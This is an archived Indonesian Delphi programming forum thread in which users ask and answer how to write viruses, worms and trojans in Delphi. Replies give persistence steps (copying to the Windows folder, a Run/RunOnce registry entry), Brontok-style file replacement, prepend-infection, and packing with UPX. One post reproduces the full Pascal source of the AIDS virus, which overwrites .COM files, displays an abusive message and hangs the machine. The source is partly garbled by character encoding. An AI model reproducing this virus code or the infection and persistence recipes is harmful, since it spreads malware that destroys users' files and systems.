Arsip: Bikin Virus, Worm, Trojan etc Menggunakan Delphi.
more 17 years ago
ashfarsadewa
Salam!
Sebelumnya saya mohon permisi kepada rekan-rekan apabila membaca subject di atas. Bukan maksud untuk berniat jahat, tapi hanya untuk melengkapi proses pembelajaran tentang pengetahuan file-file infektan.
Yang menjadi pertanyaan saya selama ini, apakah dengan bahasa pemrograman Delphi, seseorang dapat menciptakan sebuah virus/worm/trojan?
Walaupun sedikit yang saya tau, bahwa ukuran file virus jauh lebih kecil dibanding file hasil compile Delphi.
Tapi, tentunya bukan berarti file program yang dapat dihasilkan seseorang dengan bahasa pemrograman Delphi tidak dapat beraktifitas seperti virus bukan?
Sampai dengan saat ini saya belum menemukan source program tentang cara membuat virus/worm/trojan dengan menggunakan bahasa pemrograman Delphi.
Mohon pencerahan dari rekan-rekan yang lebih tau tentang topik ini.
Terima kasih.
:?
more 17 years ago
ZeAL
Yang menjadi pertanyaan saya selama ini, apakah dengan bahasa pemrograman Delphi, seseorang dapat menciptakan sebuah virus/worm/trojan? Walaupun sedikit yang saya tau, bahwa ukuran file virus jauh lebih kecil dibanding file hasil compile Delphi.Jawabnya : BISA. Malah kalo pake delphi jadi lebih bagus dibanding VB (umumnya virus lokal dibuat pake VB), soalnya kan kalo VB sangat bergantung pada library-nya... Kalo kebeneran di PC korban gak ada dll yang dibutuhkan, maka virus akan gagal tereksekusi.. Beda dengan delphi yang mengikutsertakan library-nya, maka dijamin pasti akan jalan di semua PC... Untuk masalah ukuran, kan bisa di compress.. bisa pake UPX atau ASPack.. Sebenernya komponen umum untuk bikin virus tuh gampang banget.. tinggal bikin rutin File (buka, tutup, copy, hapus, attrib) dan Registry (baca, tulis, buat, hapus).. Intinya cukup 2 itu aja..
File dieksekusi -> copy file ke dir windows (misalnya) -> buat registry entry di Run/RunOnce yang menunjuk ke file di dir windows tersebut.Selesai deh.. anda sudah mebuat virus.. Jangan lupa, yang dimaksud virus itu bukan payload-nya (memunculkan pesan, menghapus file, dsb) tapi kemampuannya untuk mereplikakan dirinya sendiri tanpa sepengetahuan korban...
more 17 years ago
ashfarsadewa
Salam!
Terima kasih ZeAL atas pencerahannya. Tapi jadi muncul pertanyaan baru, baris-baris apa (dari kode Delphi yang kita buat) yang disalinkan ke file yang akan diinfeksi? Sementara, isinya kode sumber program Delphi yang kita buat umumnya berisi perulangan, pengkondisian dan lainnya.
Lalu apa yang akan kita infeksi/tularkan ke file-file yang akan menjadi korban?
Sekali lagi terima kasih atas pencerahannya! :?
more 17 years ago
_lmz
Ada program "menarik" (rootkit) yang dibuat dengan delphi juga (meskipun juga ada assembly): hacker defender, mungkin pernah denger... sourcecodenya ada di sana juga.
Kalau tentang menginfeksi file rasanya yang begituan sekarang agak jarang. Ngapain susah-susah ganggu isinya file executable kalau naruh file dengan nama atau icon yang menipu saja nantinya juga diklik oleh usernya :P.
Untuk ashfarsadewa kalau mau menginfeksi file executable lain maka anda perlu belajar assembly dan format file executable windows dulu... Meskipun saya juga tidak bisa :P tapi paling tidak garis besarnya seperti ini:
Misal program mulai dijalankan di fungsi main(). maka tambahkan potongan program anda di file executable itu, lalu tumpukilah instruksi pertama fungsi main() untuk menjalankan potongan virus anda dulu baru kembali dan menjalankan main() seperti semestinya. Perhatikan bahwa penjelasan barusan sama sekali tidak membahas apa isi "potongan virus" itu (karena ilmu saya tidak sampai sana) :oops:.
more 17 years ago
ZeAL
ya copy file biasa aja.. untuk virus2 jaman sekarang, biasanya tidak "menempel" ke file korban.. tapi umumnya "menggantikan" file korban..
contoh di virus brontok.. icon virus sama dengan icon ms. word. Ketika virus dijalankan, virus akan men-scan semua folder dan mencari file berekstensi .doc (ms. word document) lalu kemudian virus akan meng-hidden file word asli tersebut, lalu mengkopi seluruh file virus (dirinya sendiri) ke direktori dimana file ms word yang asli berada dan merenamenya menjadi sama dengan file ms word yang asli (tentunya extensionnya tetap berbeda.. File virus akan berekstensi .exe, sedangkan file ms. word akan berekstensi .doc)
Jadi bukan perbagian (subroutine/function/perulangan/kondisi) seperti yang lo kira..
Seperti yang gue bilang sebelumnya, virus jaman sekarang UMUMNYA tidak menginfeksi file korban.. umumnya file aslinya kalo gak dihapus paling dihidden atau dipindahkan...
Kalo misalnya mau menginfeksi file korban, biasanya akan menempel di awal tubuh file korban..
Coba buka sebuah file exe dengan notepad atau wordpad, nanti keliatan kode mesin sebuah file..
Nah, virus akan menempel di awal/sebelum kode2 tersebut..
VIRUS-HEAD -- VIRUS-TAIL FILE-HEAD -- FILE-TAILJadi ketika file yang terinfeksi dijalankan, eksekusi akan menjalankan virus tersebut... Setelah virus melakukan proses, baru dialihkan ke blok kode file aslinya.. Bahasa gampangnya : "exe didalam exe"
more 17 years ago
kaka-delphi
Virus .... ?
Hhmmmm ..... musti belajar assembly tuch sebagai alat bantu dalam bercoding ....
Gw sendiri sich ga bisa buat seperti itu, masih banyak yang musti di kerjakan .... he .. hehehehehhe ... :D
more 17 years ago
ashfarsadewa
Salam!
Makasih banyak untuk pencerahannya dari rekan semua, khususnya ZeAL (yang dari tadi pagi ngubek2 mulu, thanks! buddy..it's just for knowledge), lmz, and kaka-delphi. Mudah-mudahan informasi-informasi dari rekan semua, bisa aku jadikan referensi.
Sekali lagi makaaaassiiiiiih.....! :D
more 17 years ago
antonpardede
jika agak flash-back di akhir 90-an...virus "indonesia emas" dan "serbu" dibuat dengan menggunakan turbo pascal. walau di dalam sourcenya didominasi inline asm. walau begitu, di jamannya, kedua virus ini termasuk canggih dengan teknik enkripsi dan antidebugging tingkat tinggi.
kalo sekarang, yang lokal, worm nobron alias satria dibuat dengan delphi. so jawabannya, ya bisa banget. pembuat virus dengan delphi saat ini hanya tinggal merangkai "puzzle" yang tersebar di internet, tergantung dia mau hasilnya seperti apa.
-arp-
more 17 years ago
bithedz
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ AIDS Pascal Source Code ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
{C-}
{U-}
{I-} { Wont allow a user break, enable IO check }
{ -- Constants --------------------------------------- }
Const
VirusSize = 13847; { AIDS's code size }
Warning :String[42] { Warning message }
= 'This File Has Been Infected By AIDS! HaHa!';
{ -- Type declarations------------------------------------- }
Type
DTARec =Record { Data area for file search }
DOSnext :Array of Byte;
Attr : Byte;
Ftime,
FDate,
FLsize,
FHsize : Integer;
FullName: Array of Char;
End;
Registers = Record {Register set used for file search }
Case Byte of
1 : (AX,BX,CX,DX,BP,SI,DI,DS,ES,Flags : Integer);
2 : (AL,AH,BL,BH,CL,CH,DL,DH : Byte);
End;
{ -- Variables--------------------------------------------- }
Var
{ Memory offset program code }
ProgramStart : Byte absolute Cseg:$100;
{ Infected marker }
MarkInfected : String[42] absolute Cseg:$180;
Reg : Registers; { Register set }
DTA : DTARec; { Data area }
Buffer : Array[Byte] of Byte; { Data buffer }
TestID : String[42]; { To recognize infected files }
UsePath : String[66]; { Path to search files }
{ Lenght of search path }
UsePathLenght: Byte absolute UsePath;
Go : File; { File to infect }
B : Byte; { Used }
LoopVar : Integer; {Will loop forever}
{ -- Program code------------------------------------------ }
Begin
GetDir(0, UsePath); { get current directory }
if Pos('', UsePath) <> UsePathLenght then
UsePath := UsePath + '';
UsePath := UsePath + '*.COM'; { Define search mask }
Reg.AH := $1A; { Set data area }
Reg.DS := Seg(DTA);
Reg.DX := Ofs(DTA);
MsDos(Reg);
UsePath[Succ(UsePathLenght)]:=#0; { Path must end with#0}
Reg.AH := $4E;
Reg.DS := Seg(UsePath);
Reg.DX := Ofs(UsePath[1]);
Reg.CX := $ff; { Set attribute to find ALL files }
MsDos(Reg); { Find first matching entry }
IF not Odd(Reg.Flags) Then { If a file found then }
Repeat
UsePath := DTA.FullName;
B := Pos(#0, UsePath);
If B > 0 then
Delete(UsePath, B, 255); { Remove garbage }
Assign(Go, UsePath);
Reset(Go);
If IOresult = 0 Then { If not IO error then }
Begin
BlockRead(Go, Buffer, 2);
Move(Buffer[$80], TestID, 43);
{ Test if file already ill(Infected) }
If TestID <> Warning Then { If not then ... }
Begin
Seek (Go, 0);
{ Mark file as infected and .. }
MarkInfected := Warning;
{ Infect it }
BlockWrite(Go,ProgramStart,Succ(VirusSize shr 7));
Close(Go);
Halt; {.. and halt the program }
End;
Close(Go);
End;
{ The file has already been infected, search next. }
Reg.AH := $4F;
Reg.DS := Seg(DTA);
Reg.DX := Ofs(DTA);
MsDos(Reg);
{ ......................Until no more files are found }
Until Odd(Reg.Flags);
Loopvar:=Random(10);
If Loopvar=7 then
begin
Writeln(''); {Give a lot of smiles}
Writeln('');
Writeln(' ');
Writeln(' ATTENTION: ');
Writeln(' I have been elected to inform you that throughout your process of ');
Writeln(' collecting and executing files, you have accidentally Hš›Kä ');
Writeln(' yourself over; again, that''s PHUCKED yourself over. No, it cannot ');
Writeln(' be; YES, it CAN be, a ûç–s has infected your system. Now what do ');
Writeln(' you have to say about that? HAHAHAHA. Have Hš¥ with this one and ');
Writeln(' remember, there is NO cure for ');
Writeln(' ');
Writeln(' ÛÛÛÛÛÛÛÛÛÛ ÛÛÛÛÛÛÛÛÛÛÛÛ ÛÛÛÛÛÛÛÛÛÛÛ ÛÛÛÛÛÛÛÛÛÛ ');
Writeln(' ÛÛÛ±±±±±±ÛÛÛ ±±±±ÛÛ±±±±±± ÛÛ±±±±±±±ÛÛÛ ÛÛÛ±±±±±±±ÛÛ ');
Writeln(' ÛÛ±± ÛÛ± ÛÛ± ÛÛ± ÛÛ± ÛÛ±± ±± ');
Writeln(' ÛÛ± ÛÛ± ÛÛ± ÛÛ± ÛÛ± ÛÛ± ');
Writeln(' ÛÛÛÛÛÛÛÛÛÛÛÛ± ÛÛ± ÛÛ± ÛÛ± ÛÛÛÛÛÛÛÛÛÛÛÛ ');
Writeln(' ÛÛ±±±±±±±±ÛÛ± ÛÛ± ÛÛ± ÛÛ± ±±±±±±±±±ÛÛ± ');
Writeln(' ÛÛ± ÛÛ± ÛÛ± ÛÛ± ÛÛ± ÛÛ± ');
Writeln(' ÛÛ± ÛÛ± ÛÛ± ÛÛ± ÛÛÛ± ÛÛ ÛÛÛ± ');
Writeln(' ÛÛ± ÛÛ± ÛÛÛÛÛÛÛÛÛÛÛÛ ÛÛÛÛÛÛÛÛÛÛÛ±± ÛÛÛÛÛÛÛÛÛÛ±± ');
Writeln(' ±± ±± ±±±±±±±±±±±± ±±±±±±±±±±± ±±±±±±±±±± ');
Writeln(' ');
Writeln(' ');
REPEAT
LOOPVAR:=0;
UNTIL LOOPVAR=1;
end;
End.
yup bisa banget lah! itu di atas salah satu contoh yang di bikin dari pascal moyangnya delphi.
NB: buat Moderator klo posting ini di rasa mengganggu delete aja.
more 17 years ago
_lmz
OT:
itu syntax highlighter apa sebenarnya punyanya C yang dimodif? Kok setiap ada backslash dalam string dianggap escape? Misalnya postingan di atas stringnya dianggap gak selesai-selesai karena isinya cuma backslash aja...
more ...
- Pages:
- 1
- 2
reply |
Report Obsolete
Last Articles
Last Topic
- PascalTalk #6: (Podcast) Kuliah IT di luar negeri, susah gak sih?
by LuriDarmawan in Tutorial & Community Project more 3 years ago - PascalTalk #5: UX: Research, Design and Engineer
by LuriDarmawan in Tutorial & Community Project more 3 years ago - PascalTalk #4: Obrolan Ringan Seputar IT
by LuriDarmawan in Tutorial & Community Project more 3 years ago - PascalTalk #2: Membuat Sendiri SMART HOME
by LuriDarmawan in Tutorial & Community Project more 3 years ago - PascalTalk #3: RADically Fast and Easy Mobile Apps Development with Delphi
by LuriDarmawan in Tutorial & Community Project more 3 years ago - PascalTalk #1: Pemanfaatan Artificial Intelligence di Masa Covid-19
by LuriDarmawan in Tutorial & Community Project more 3 years ago - Tempat Latihan Posting
by LuriDarmawan in OOT more 4 years ago - Archive
- Looping lagi...
by idhiel in Hal umum tentang Pascal Indonesia more 11 years ago - [ask] koneksi ke ODBC user Dsn saat runtime dengan ado
by halimanh in FireBird more 11 years ago - Validasi menggunakan data tanggal
by mas_kofa in Hal umum tentang Pascal Indonesia more 11 years ago
Random Topic
- Form memanggil form lain
by akudana in Tip n Trik Pemrograman more 14 years ago - beda tabel beda fungsi..?
by nurez in OOT more 18 years ago - Virus Atau Bukan...Yg Gue Bantai.....xixixixixi
by saysansay in Bedah Kasus more 16 years ago - Akses field
by hera in Paradox more 15 years ago - Program Enkripsi sederhana: tombol decrypt tidak berfungsi
by ilhuna in Lain-lain more 12 years ago - Surga dunia neraka akhirat
by DelphiExpert in OOT more 14 years ago - About Printer
by krishy in Tip n Trik Pemrograman more 16 years ago - data dlm 1 field tampil jadi 2 field
by imunk in Enginering more 18 years ago - Grab halaman Web
by yosstefano in OOT more 17 years ago - FreePascal v.2.2 has been released!
by simba in OpenSource dan Gratis more 16 years ago